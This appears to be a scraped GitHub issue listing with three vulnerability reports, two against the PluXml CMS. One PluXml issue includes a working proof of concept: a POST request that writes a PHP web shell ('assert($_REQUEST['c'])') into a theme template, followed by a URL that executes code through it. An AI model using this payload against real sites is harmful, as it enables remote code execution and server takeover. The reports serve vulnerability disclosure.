hule

Results 3 issues of hule

Payload: 1.user 'test' submit a report ![image](https://user-images.githubusercontent.com/9081952/54010473-dc21ec80-41a9-11e9-8d2b-0d1927163c70.png) 2admin export report ![image](https://user-images.githubusercontent.com/9081952/54010480-e17f3700-41a9-11e9-9066-5656d2ae1cde.png) 3.open the report ![image](https://user-images.githubusercontent.com/9081952/54010483-e512be00-41a9-11e9-9db9-bb4d35a0905f.png)

class.plx.admin.php in PluXml allows attackers to execute arbitrary PHP code by modify the configuration file. Source /PluXml/core/lib/class.plx.admin.php line 129~140: ``` if(isset($content['config_path'])) { $newpath=trim($content['config_path']); if($newpath!=PLX_CONFIG_PATH) { # relocalisation du dossier de...

bug

The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template. Poc: `/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A` ![image](https://user-images.githubusercontent.com/9081952/52915299-24698f80-330d-11e9-88d4-796c2bca6205.png) `then visit /PluXml/themes/defaut/tags.php?c=phpinfo();` ![image](https://user-images.githubusercontent.com/9081952/52915303-36e3c900-330d-11e9-9d93-0675ad8c8b1a.png)

bug